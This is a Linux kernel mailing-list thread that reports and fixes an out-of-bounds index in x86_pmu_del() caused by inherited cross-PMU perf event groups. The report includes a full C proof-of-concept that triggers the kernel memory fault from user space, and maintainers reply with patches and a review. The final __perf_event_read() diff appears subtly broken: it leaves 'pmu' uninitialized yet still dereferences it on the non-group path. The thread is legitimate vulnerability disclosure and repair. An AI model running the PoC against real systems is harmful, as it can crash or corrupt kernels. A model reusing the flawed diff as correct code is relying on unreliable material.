* [PATCH] perf_events: fix array-index-out-of-bounds in x86_pmu_del
@ 2026-03-09 1:41 Oliver Rosenberg
2026-03-09 12:05 ` Peter Zijlstra
0 siblings, 1 reply; 4+ messages in thread
From: Oliver Rosenberg @ 2026-03-09 1:41 UTC (permalink / raw)
Cc: olrose55, Peter Zijlstra, Ingo Molnar, Arnaldo Carvalho de Melo,
Namhyung Kim, Mark Rutland, Alexander Shishkin, Jiri Olsa,
Ian Rogers, Adrian Hunter, James Clark, Thomas Gleixner,
Borislav Petkov, Dave Hansen, x86, H. Peter Anvin, Ravi Bangoria,
linux-perf-users, linux-kernel
Vulnerability Description:
There exists a KASAN wild-memory-access and an array-index-out-of-bounds
(-1 index) in x86_pmu_del(). When a cross-PMU event group is created
whose group leader belongs to a PMU type that does not implement
transactions, cpuc->txn_flags is never set for the siblings: only the
group leader's pmu->start_txn() is called, and for a PMU without
transaction support that callback is perf_pmu_nop_txn(). The events are
still scheduled as a group, so when one of the x86 PMU events fails to
schedule, cpuc->txn_flags is unset and event->hw.idx is still -1.
x86_pmu_del() expects event->hw.idx to be unset only while events are
batched and not yet enabled during a transaction, and checks
cpuc->txn_flags to skip the index uses in that case. However, when an
event errors out and the group is rolled back without the transaction
flag set, the check does not fire and event->hw.idx (-1) is used as a
negative array index.
Vulnerability Reproduction (POC):
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <linux/perf_event.h>

static int peo(struct perf_event_attr *a, int g)
{
	return syscall(__NR_perf_event_open, a, 0, -1, g, 0);
}

int main(void)
{
	struct perf_event_attr raw = {}, bp = {};
	int fds[64], n = 0, leader;

	raw.type = PERF_TYPE_RAW;
	raw.size = sizeof(raw);
	raw.config = 0x76;
	raw.exclude_kernel = 1;

	/* Probe how many raw events fit on the PMU. */
	leader = peo(&raw, -1);
	if (leader < 0)
		return 1;
	while (n < 64 && (fds[n] = peo(&raw, leader)) >= 0)
		n++;
	for (int i = 0; i < n; i++)
		close(fds[i]);
	close(leader);
	if (n <= 0)
		return 1;

	bp.type = PERF_TYPE_BREAKPOINT;
	bp.size = sizeof(bp);
	bp.bp_type = 4; /* HW_BREAKPOINT_X */
	bp.bp_len = sizeof(long);
	bp.exclude_kernel = 1;
	bp.inherit = 1;

	/* Cross-PMU group: breakpoint leader, two x86 raw siblings. */
	leader = peo(&bp, -1);
	if (leader < 0)
		return 1;
	raw.inherit = 1;
	if (peo(&raw, leader) < 0 || peo(&raw, leader) < 0)
		return 1;

	/* Fill the remaining counters so the group cannot schedule. */
	for (int i = 0; i < n; i++)
		if (peo(&raw, -1) < 0)
			return 1;

	/* Inherit the context into a child to trigger the bug. */
	if (fork() == 0)
		_exit(0);
	wait(NULL);
	return 0;
}
POC Explanation:
The POC first fills the CPU's PMU counters with x86 raw PMU events
(PERF_TYPE_RAW, type 4) so that group scheduling will fail. It then
creates a cross-PMU group with a BREAKPOINT event (PERF_TYPE_BREAKPOINT,
type 5) as the group leader and two x86 raw PMU siblings. The first
sibling is added but only batched, not enabled; the second sibling fails
in ->add() because the CPU's maximum number of PMU events is exceeded.
This triggers cleanup of the first sibling, for which cpuc->txn_flags is
not set and event->hw.idx is -1 since it was never enabled, so
event->hw.idx is used as an out-of-bounds array index in x86_pmu_del().
Suggested Fix:
The suggested fix is to add a check in x86_pmu_del() to verify that
event->hw.idx is set before using the value. If it is not set, jump over
the uses of event->hw.idx and proceed directly with removing the event
from the event list.
Fixes: bd2756811766 ("perf: Rewrite core context handling")
Signed-off-by: Oliver Rosenberg <olrose55@gmail.com>
---
Notes:
This patch fixes the symptom and prevents the array-index-out-of-bounds
caused by the use of hw->idx when it is not set. I was not sure whether
it would also make sense to address the root cause, which is
cpuc->txn_flags not being set for PMU events in a group whose leader
does not implement transactions, or whether that would require a
redesign of how group events are processed, with potential performance
degradations.
arch/x86/events/core.c | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/arch/x86/events/core.c b/arch/x86/events/core.c
index 03ce1bc7e..7474b2d66 100644
--- a/arch/x86/events/core.c
+++ b/arch/x86/events/core.c
@@ -1655,6 +1655,9 @@ static void x86_pmu_del(struct perf_event *event, int flags)
if (cpuc->txn_flags & PERF_PMU_TXN_ADD)
goto do_del;
+ if (event->hw.idx < 0)
+ goto remove_from_list;
+
__set_bit(event->hw.idx, cpuc->dirty);
/*
@@ -1663,6 +1666,8 @@ static void x86_pmu_del(struct perf_event *event, int flags)
x86_pmu_stop(event, PERF_EF_UPDATE);
cpuc->events[event->hw.idx] = NULL;
+remove_from_list:
+
for (i = 0; i < cpuc->n_events; i++) {
if (event == cpuc->event_list[i])
break;
--
2.43.0
* Re: [PATCH] perf_events: fix array-index-out-of-bounds in x86_pmu_del
2026-03-09 1:41 [PATCH] perf_events: fix array-index-out-of-bounds in x86_pmu_del Oliver Rosenberg
@ 2026-03-09 12:05 ` Peter Zijlstra
2026-03-09 13:37 ` Peter Zijlstra
0 siblings, 1 reply; 4+ messages in thread
From: Peter Zijlstra @ 2026-03-09 12:05 UTC (permalink / raw)
To: Oliver Rosenberg
Cc: Ingo Molnar, Arnaldo Carvalho de Melo, Namhyung Kim, Mark Rutland,
Alexander Shishkin, Jiri Olsa, Ian Rogers, Adrian Hunter,
James Clark, Thomas Gleixner, Borislav Petkov, Dave Hansen, x86,
H. Peter Anvin, Ravi Bangoria, linux-perf-users, linux-kernel
On Sun, Mar 08, 2026 at 06:41:30PM -0700, Oliver Rosenberg wrote:
> Vulnerability Description:
> There exists a KASAN wild-memory-access and an array-index-out-of-bounds
> (-1 index) in x86_pmu_del(). When a cross-PMU event group is created
> whose group leader belongs to a PMU type that does not implement
> transactions, cpuc->txn_flags is never set for the siblings: only the
> group leader's pmu->start_txn() is called, and for a PMU without
> transaction support that callback is perf_pmu_nop_txn(). The events are
> still scheduled as a group, so when one of the x86 PMU events fails to
> schedule, cpuc->txn_flags is unset and event->hw.idx is still -1.
> x86_pmu_del() expects event->hw.idx to be unset only while events are
> batched and not yet enabled during a transaction, and checks
> cpuc->txn_flags to skip the index uses in that case. However, when an
> event errors out and the group is rolled back without the transaction
> flag set, the check does not fire and event->hw.idx (-1) is used as a
> negative array index.
I can confirm your POC works, and that the above is somehow what
happens. But it is not what should be happening.
Specifically, by adding an x86 event to a 'software' event group, the
software event should be moved to the x86 pmu_ctx (the move_group case
in perf_event_open()), and then group_event->pmu_ctx->pmu should end up
being the x86 pmu in group_sched_in().
Tracing shows the move_group path is indeed taken and pmu_ctx is
adjusted.
> POC Explanation:
> The POC first fills the CPU's PMU counters with x86 raw PMU events
> (PERF_TYPE_RAW, type 4) so that group scheduling will fail. It then
> creates a cross-PMU group with a BREAKPOINT event (PERF_TYPE_BREAKPOINT,
> type 5) as the group leader and two x86 raw PMU siblings. The first
> sibling is added but only batched, not enabled; the second sibling fails
> in ->add() because the CPU's maximum number of PMU events is exceeded.
> This triggers cleanup of the first sibling, for which cpuc->txn_flags is
> not set and event->hw.idx is -1 since it was never enabled, so
> event->hw.idx is used as an out-of-bounds array index in x86_pmu_del().
You're forgetting part of what the POC does:
if (fork() == 0) _exit(0);
wait(NULL);
Without that, it doesn't reproduce. Suggesting there's something wrong
with inherit.
And indeed, the below makes it go away.
Now, let me go audit the code to see if this same problem exists in more
shapes...
diff --git a/arch/x86/events/core.c b/arch/x86/events/core.c
index 03ce1bc7ef2e..75cd651a7f55 100644
--- a/arch/x86/events/core.c
+++ b/arch/x86/events/core.c
@@ -1655,6 +1655,8 @@ static void x86_pmu_del(struct perf_event *event, int flags)
if (cpuc->txn_flags & PERF_PMU_TXN_ADD)
goto do_del;
+ WARN_ON(event->hw.idx < 0);
+
__set_bit(event->hw.idx, cpuc->dirty);
/*
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 03ced7aad309..ab968203b735 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -14743,7 +14749,7 @@ inherit_event(struct perf_event *parent_event,
get_ctx(child_ctx);
child_event->ctx = child_ctx;
- pmu_ctx = find_get_pmu_context(child_event->pmu, child_ctx, child_event);
+ pmu_ctx = find_get_pmu_context(parent_event->pmu_ctx->pmu, child_ctx, child_event);
if (IS_ERR(pmu_ctx)) {
free_event(child_event);
return ERR_CAST(pmu_ctx);
* Re: [PATCH] perf_events: fix array-index-out-of-bounds in x86_pmu_del
2026-03-09 12:05 ` Peter Zijlstra
@ 2026-03-09 13:37 ` Peter Zijlstra
2026-03-09 15:48 ` Ian Rogers
0 siblings, 1 reply; 4+ messages in thread
From: Peter Zijlstra @ 2026-03-09 13:37 UTC (permalink / raw)
To: Oliver Rosenberg
Cc: Ingo Molnar, Arnaldo Carvalho de Melo, Namhyung Kim, Mark Rutland,
Alexander Shishkin, Jiri Olsa, Ian Rogers, Adrian Hunter,
James Clark, Thomas Gleixner, Borislav Petkov, Dave Hansen, x86,
H. Peter Anvin, Ravi Bangoria, linux-perf-users, linux-kernel
On Mon, Mar 09, 2026 at 01:05:43PM +0100, Peter Zijlstra wrote:
> Now, let me go audit the code to see if this same problem exists in more
> shapes...
I've ended up with the below.
---
Subject: perf: Make sure to use pmu_ctx->pmu for groups
From: Peter Zijlstra <peterz@infradead.org>
Date: Mon Mar 9 13:55:46 CET 2026
Oliver reported that x86_pmu_del() ended up doing an out-of-bounds memory
access when group_sched_in() fails and needs to roll back.
This *should* be handled by the transaction callbacks, but he found that when
the group leader is a software event, the transaction handlers of the wrong PMU
are used. Despite the move_group case in perf_event_open() and group_sched_in()
using pmu_ctx->pmu.
Turns out, inherit uses event->pmu to clone the events, effectively undoing the
move_group case for all inherited contexts. Fix this by also making inherit use
pmu_ctx->pmu, ensuring all inherited counters end up in the same pmu context.
Similarly, __perf_event_read() should equally use pmu_ctx->pmu for the
group case.
Fixes: bd2756811766 ("perf: Rewrite core context handling")
Reported-by: Oliver Rosenberg <olrose55@gmail.com>
Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
---
kernel/events/core.c | 14 ++++++--------
1 file changed, 6 insertions(+), 8 deletions(-)
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -4813,7 +4813,7 @@ static void __perf_event_read(void *info
struct perf_event *sub, *event = data->event;
struct perf_event_context *ctx = event->ctx;
struct perf_cpu_context *cpuctx = this_cpu_ptr(&perf_cpu_context);
- struct pmu *pmu = event->pmu;
+ struct pmu *pmu;
/*
* If this is a task context, we need to check whether it is
@@ -4825,7 +4825,7 @@ static void __perf_event_read(void *info
if (ctx->task && cpuctx->task_ctx != ctx)
return;
- raw_spin_lock(&ctx->lock);
+ guard(raw_spinlock)(&ctx->lock);
ctx_time_update_event(ctx, event);
perf_event_update_time(event);
@@ -4833,14 +4833,15 @@ static void __perf_event_read(void *info
perf_event_update_sibling_time(event);
if (event->state != PERF_EVENT_STATE_ACTIVE)
- goto unlock;
+ return;
if (!data->group) {
pmu->read(event);
data->ret = 0;
- goto unlock;
+ return;
}
+ pmu = event->pmu_ctx->pmu;
pmu->start_txn(pmu, PERF_PMU_TXN_READ);
pmu->read(event);
@@ -4849,9 +4850,6 @@ static void __perf_event_read(void *info
perf_pmu_read(sub);
data->ret = pmu->commit_txn(pmu);
-
-unlock:
- raw_spin_unlock(&ctx->lock);
}
static inline u64 perf_event_count(struct perf_event *event, bool self)
@@ -14743,7 +14741,7 @@ inherit_event(struct perf_event *parent_
get_ctx(child_ctx);
child_event->ctx = child_ctx;
- pmu_ctx = find_get_pmu_context(child_event->pmu, child_ctx, child_event);
+ pmu_ctx = find_get_pmu_context(parent_event->pmu_ctx->pmu, child_ctx, child_event);
if (IS_ERR(pmu_ctx)) {
free_event(child_event);
return ERR_CAST(pmu_ctx);
* Re: [PATCH] perf_events: fix array-index-out-of-bounds in x86_pmu_del
2026-03-09 13:37 ` Peter Zijlstra
@ 2026-03-09 15:48 ` Ian Rogers
0 siblings, 0 replies; 4+ messages in thread
From: Ian Rogers @ 2026-03-09 15:48 UTC (permalink / raw)
To: Peter Zijlstra
Cc: Oliver Rosenberg, Ingo Molnar, Arnaldo Carvalho de Melo,
Namhyung Kim, Mark Rutland, Alexander Shishkin, Jiri Olsa,
Adrian Hunter, James Clark, Thomas Gleixner, Borislav Petkov,
Dave Hansen, x86, H. Peter Anvin, Ravi Bangoria, linux-perf-users,
linux-kernel
On Mon, Mar 9, 2026 at 6:37 AM Peter Zijlstra <peterz@infradead.org> wrote:
>
> On Mon, Mar 09, 2026 at 01:05:43PM +0100, Peter Zijlstra wrote:
> > Now, let me go audit the code to see if this same problem exists in more
> > shapes...
>
> I've ended up with the below.
>
> ---
> Subject: perf: Make sure to use pmu_ctx->pmu for groups
> From: Peter Zijlstra <peterz@infradead.org>
> Date: Mon Mar 9 13:55:46 CET 2026
>
> Oliver reported that x86_pmu_del() ended up doing an out-of-bounds memory
> access when group_sched_in() fails and needs to roll back.
>
> This *should* be handled by the transaction callbacks, but he found that when
> the group leader is a software event, the transaction handlers of the wrong PMU
> are used. Despite the move_group case in perf_event_open() and group_sched_in()
> using pmu_ctx->pmu.
>
> Turns out, inherit uses event->pmu to clone the events, effectively undoing the
> move_group case for all inherited contexts. Fix this by also making inherit use
> pmu_ctx->pmu, ensuring all inherited counters end up in the same pmu context.
>
> Similarly, __perf_event_read() should equally use pmu_ctx->pmu for the
> group case.
>
> Fixes: bd2756811766 ("perf: Rewrite core context handling")
> Reported-by: Oliver Rosenberg <olrose55@gmail.com>
> Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Reviewed-by: Ian Rogers <irogers@google.com>
Thanks,
Ian
> ---
> kernel/events/core.c | 14 ++++++--------
> 1 file changed, 6 insertions(+), 8 deletions(-)
>
> --- a/kernel/events/core.c
> +++ b/kernel/events/core.c
> @@ -4813,7 +4813,7 @@ static void __perf_event_read(void *info
> struct perf_event *sub, *event = data->event;
> struct perf_event_context *ctx = event->ctx;
> struct perf_cpu_context *cpuctx = this_cpu_ptr(&perf_cpu_context);
> - struct pmu *pmu = event->pmu;
> + struct pmu *pmu;
>
> /*
> * If this is a task context, we need to check whether it is
> @@ -4825,7 +4825,7 @@ static void __perf_event_read(void *info
> if (ctx->task && cpuctx->task_ctx != ctx)
> return;
>
> - raw_spin_lock(&ctx->lock);
> + guard(raw_spinlock)(&ctx->lock);
> ctx_time_update_event(ctx, event);
>
> perf_event_update_time(event);
> @@ -4833,14 +4833,15 @@ static void __perf_event_read(void *info
> perf_event_update_sibling_time(event);
>
> if (event->state != PERF_EVENT_STATE_ACTIVE)
> - goto unlock;
> + return;
>
> if (!data->group) {
> pmu->read(event);
> data->ret = 0;
> - goto unlock;
> + return;
> }
>
> + pmu = event->pmu_ctx->pmu;
> pmu->start_txn(pmu, PERF_PMU_TXN_READ);
>
> pmu->read(event);
> @@ -4849,9 +4850,6 @@ static void __perf_event_read(void *info
> perf_pmu_read(sub);
>
> data->ret = pmu->commit_txn(pmu);
> -
> -unlock:
> - raw_spin_unlock(&ctx->lock);
> }
>
> static inline u64 perf_event_count(struct perf_event *event, bool self)
> @@ -14743,7 +14741,7 @@ inherit_event(struct perf_event *parent_
> get_ctx(child_ctx);
> child_event->ctx = child_ctx;
>
> - pmu_ctx = find_get_pmu_context(child_event->pmu, child_ctx, child_event);
> + pmu_ctx = find_get_pmu_context(parent_event->pmu_ctx->pmu, child_ctx, child_event);
> if (IS_ERR(pmu_ctx)) {
> free_event(child_event);
> return ERR_CAST(pmu_ctx);